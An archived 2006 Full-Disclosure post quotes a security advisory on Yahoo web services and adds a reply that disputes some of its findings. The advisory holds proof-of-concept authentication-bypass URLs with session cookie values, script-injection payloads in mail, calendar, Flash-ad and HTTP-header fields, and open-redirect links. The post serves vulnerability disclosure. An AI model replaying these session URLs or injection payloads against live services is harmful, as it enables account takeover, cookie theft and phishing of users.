lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed Jun 21 14:10:20 2006
From: n3td3v at gmail.com (n3td3v)
Subject: Yahoo Multiple vulnerabilities (Authentication
	Bypass, Session Binding, Cookie Encoding Security Weakness,
	Cross-Site Scripting and URL Redirection)

On 6/20/06, Rajesh Sethumadhavan <rajesh.sethumadhavan@...oo.com> wrote:
>
>
>  ------------------------------
> How low will we go? Check out Yahoo! Messenger's low PC-to-Phone call
> rates.
> <http://us.rd.yahoo.com/mail_us/taglines/postman8/*http://us.rd.yahoo.com/evt=39663/*http://voice.yahoo.com>
>
>
>
> Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding,
> Cookie Encoding Security Weakness, Cross-Site Scripting and URL
> Redirection)
>
>
> ############################################################################
> #
> #       XDisclose Advisory      : XD100001
> #       Advisory Released       : 20th June 06
> #       Credit                  : Rajesh Sethumadhavan
> #
> #       Class                   : Authentication Bypass
> #                                 Session Binding Vulnerability
> #                                 Cookies Encoding Security Weakness
> #                                 Cross-Site Scripting
> #                                 URL redirection
> #       Severity                : Medium
> #       Solution Status         : Unpatched
> #       Vendor                  : Yahoo
> #       Affected applications   : Yahoo multiple web-based services
> #
>
> ############################################################################
>
>
> Overview:
> Yahoo! Inc. is an American computer services company with a mission to "be
> the most essential global Internet service for consumers and businesses".
> It
> operates an Internet portal, including the popular Yahoo! Mail.Accordingto
> Web trends Yahoo! is the most visited website on the Internet today with
> more
> than 400 million unique users. The global network of Yahoo! websites
> received
> 3.4 billion page views per day on average as of October 2005.
>
> Various Yahoo! services are vulnerable to authentication bypass, session
> binding, weak cookie encoding, cross-site scripting file inclusion and url
> redirection vulnerabilities, which is caused due to improper validation of
> user-supplied inputs.
>
> Description:
> Multiple vulnerabilities exist in various Yahoo services.
>
>
> 1. Authentication Bypass and Session Binding Vulnerability.
>   A malicious user can log on to the yahoo without submitting the username
>   and password by constructing a malicious URL using cookies.
>
>   Same session (URL) can be used to login multiple times from multiple IP
>   address leading to session binding vulnerability.
>
>   POC:
>
> --------------------------------------------------------------------------
>
> http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
>   %26l=i42.j4ij
> /o&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
>   BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http%3a//mail.yahoo.com
>
> --------------------------------------------------------------------------
>
> http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
>   %26l=i42.j4ij
> /o%26p=m2gvvind12000700&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMU
>
> FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http
>   %3a//mail.yahoo.com
>
> --------------------------------------------------------------------------
>
>   Where in "sk" & "d" is session
>
>   Screenshot:
>   http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png
>
>
>
> 2. Cookie Encoding Security Weakness
>   Implementation of cookies in yahoo is too weak that it can be decoded
>   easily. A malicious attacker can easily collect many personal
> information
>   using cookies like year of birth, zipcode, country and name which can be
>   used to get password from "yahoo forgot password".
>
>   Where in
>   sk & d is session
>   n is password
>   l is username
>   p is country, year of birth, gender and more
>   b is cookies created
>   lg is language
>   intl is international language
>   iz is zipcode
>   jb is Industry and title
>
>   POC Screenshot:
>   http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png
>
> 3. Cross-Site Scripting.
>   This vulnerability is resulted from the failure of Yahoo! filtering
> engine
>   to block cretin user-supplied inputs
>
>   a) Yahoo Calendar Service XSS
>        The flaws are due to improper sanitization of inputs passed to
>        "Location", "Address", "Street" and "Phone".
>
>
>  ========================================================================
>        This event repeats every day.
>        </font><br>
>        <font face="Arial" size=-1>
>        <b>Event Location</b>: <script>alert('Location')</script>
>        <br><b>Street</b>: <script>alert('Address')</script>
>        <br><b>City, State, Zip</b>: <script>alert('Street')</script>
>        <br><b>Phone</b>: <script>alert('Phone')</script>
>        </font><br>
>
>  ========================================================================
>
>        Screenshot:
>        http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png
>        http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png
>        http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png
>        http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png
>
>
>   b) Yahoo Options Mail Account XSS
>        The flaws are due to improper sanitization of inputs passed to
> "Name"
>        and "Reply to" parameters.
>
>
>
>  ========================================================================
>        <tr valign="top">
>        <td>Name:</td>
>        <td><script>alert('Name')</script></td>
>        </tr>
>
>        <tr valign="top">
>        <td>Email:</td>
>        <td>sec.test@...oo.com</td>
>        </tr>
>        <tr valign="top">
>        <td>Reply-To:</td>
>        <td><script>alert('Reply')</script>@yah.com</td>
>        </tr>
>
>  ========================================================================
>
>        Screenshot:
>        http://www.xdisclose.bravehost.com/Images/XSS Mail Account
> Reply.png
>        http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png
>
>
>   c) Yahoo Options Filter XSS.
>        The flaws are due to improper sanitization of inputs passed to
> "From"
>        and "To" parameters
>
>
>  ========================================================================
>        <b>From</b>     contains
>        "<b><script>alert('From')</script>@yahoo.com</b>"
>        <br>
>        <b>To/CC</b> contains
>        "<b><script>alert('To')</script>@yahoo.com</b>"
>        <br>
>
>  ========================================================================
>
>        Screenshot:
>        http://www.xdisclose.bravehost.com/Images/Xss Filter From.png
>        http://www.xdisclose.bravehost.com/Images/Xss Filter To.png
>
>
>   d) Yahoo Ads flash file XSS.
>        The flaws are due to improper sanitization of inputs passed to
> flash Ads
>        files
>
>        Exploit:
>
>  -----------------------------------------------------------------------
>        http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
>        20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('XSS%20
>        Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
>        http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
>        20060330_68006_1_425x600_monster_morph_asker_1_check.swf?clickTAG=
>        javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20
>        Rajesh')
>
>        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
>
>  042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript:alert('XSS
>        %20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
>        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
>
>  042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascript:alert
>        ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
>
> http://ad.ie.doubleclick.net/812666/specsavers_2for1euro_300x250.swf?
>
>  clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20
>        By%20Rajesh')
>
>        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
>        042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript:alert
>        ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
>        http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
>        20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascript:alert
>        ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
>        http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
>
>  20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=javascript:
>        alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
>
>        and more
>
>  -----------------------------------------------------------------------
>
>        Screenshot:
>        http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png
>
>
>   e) Yahoo Mail Beta HTTP Header XSS
>        The flaws are due to improper sanitization of inputs passed to all
> HTTP
>        header like Accept, Accept-Charset, Accept-Language, Cache-Control,
>        Connection, Content-Length, Content-Type, Cookie, Keep-Alive,
> Pragma,
>        SOAPAction and User-Agent in Yahoo Mail Beta.
>
>        POC :
>
>  ========================================================================
>        GET :
> http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=CKyO7/zcUU2
>
>        Host: uk.f555.mail.yahoo.com
>        User-Agent: <script>alert('User-Agent:')</script>
>        Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=
> 0.9,
>        text/plain;q=0.8,image/png,*/*;q=0.5
> ;<script>alert('Accept:')</script>
>        Accept-Language: en-us,en;q=0.5
> ;<script>alert('Accept-Language:')</script>
>        Accept-Encoding:
> gzip,deflate;<script>alert('Accept-Encoding:')</script>
>        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert
>        ('Accept-Charset:')</script>
>        Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
>        Connection: keep-alive;<script>alert('Connection:')</script>
>        SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert('SOAPAction:')
>        </script>
>        Content-Length: <script>alert('Content-Length:')</script>
>        Content-Type:
> application/xml;<script>alert('Content-Type:')</script>
>        Cookie: B=dcnl4j129c7tu&b=3&s=j3;
>
>  F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxwPKS6&b=bIpq;
>        Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij
> /o&p=m2gvvind12000700&jb=19|24|&iz=123456
>        r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
>
>  T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAAZ7oQuYalSuV&
>
>  d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0
>        E-;
>        U=mt=
> 7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0kvgvgv3qlf11;
>        YM.dpref1=sec.test%3Aspp%257C1;<script>alert('Cookie:')</script>
>        Pragma: no-cache;<script>alert('Pragma:')</script>
>        Cache-Control: no-cache;<script>alert('Cache-Control:')</script>
>
>  ========================================================================
>
>        Screenshot:
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Accept-Charset.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Accept-Language.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Cache-Control.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Connection.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Content-Length.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Content-Type.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> Keep-Alive.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> SoapAction.png
>        http://www.xdisclose.bravehost.com/Images/XSS MailBeta
> User-Agent.png
>
>
>        Impact:
>        Successful exploitation allows execution of arbitrary script code
>        in a users browser session in context of an affected site which may
>         allow to steal cookie based authentication credentials.
>
> 3. URL redirection.
>   This is due failure of filtering of incoming untrusted data before the
>   content reaches their users .This can be exploited for phishing attack.
> The
>   vulnerable parameters are yahoo search web, image, video, preferences,
> cache,
>   yahoo answers and more urls containing /*http://yahoo.com or /**http://
>   yahoo.com
>
>   Exploit:
>
> ---------------------------------------------------------------------------
>   http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/EXP=
>   1148028186/**http%3a//www.xdisclose.com
>
>   http://search.yahoo.com/preferences/preferences?pref_done=
>   http%3a//www.xdisclose.com
>
> ---------------------------------------------------------------------------
>
>   Screenshot:
>   http://www.xdisclose.bravehost.com/Images/URL Redirection WebSearch.png
>   http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png
>   http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png
>
> 4) Interesting facts about Yahoo
>   Yahoo Mail Inbox shows wrong unread messages count if it is above 65535
>   unread messages.
>
>   Screenshot:
>   http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png
>
> Original Advisory:
> http://www.xdisclose.com/XD100001.txt
>
> Credits:
> Rajesh Sethumadhavan has been credited with the discovery of this
> vulnerability
>
>
> Disclaimer:
> This entire document is strictly for educational, testing and
> demonstrating
> purpose only. Modification use and/or publishing this information is
> entirely on
> your own risk. The exploit code is to be used on your own email account. I
> am
> not liable for any direct or indirect damages caused as a result of using
> the
> information or demonstrations provided in any part of this advisory.
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



A couple of pointers on this disclosure, the disclosure is slightly
misleading on those not experienced with Yahoo:

The redirect claim is bogus, it is part of the design of the system. There
have been people reporting this to Yahoo for years, and Yahoo just need to
shrug it off.

The cookie claim is bogus, Yahoo cookies use a ROT system which isn't ment
to be difficult for you to decrypt and read. It is a very simple system to
decrypt by design.

There have been programs and documentation made available for years to
automatically read ROT.

My friends back in 1999 when they started off hacking, one of the first
programs they made was a "make life easier" ROT decrpytion tool for Yahoo
cookies.

There is no sensitive data kept within a Yahoo cookie.

The most you'll learn is the username for the cookie, and the Yahoo services
that username has visited.

The rest with your cross-site scripting claim is legitimate.

As for the rest, they are reported often to Yahoo and mistaken as a system
flaw. (The ROT cookie decrpyt and URL redirection address)

Well done on the cross-site scripting though.

Your subject header is slightly misleading for people unfirmilar with Yahoo
standard pratices in regards with cookies and their URL redirection system.

Google has a URL redirection address as well... it is there to log stats,
like the Yahoo URL redirection address is.

Yahoo contact:

http://security.yahoo.com

n3td3v contact:

http://n3td3v.googlepages.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060620/7740a2de/attachment.html

Powered by blists - more mailing lists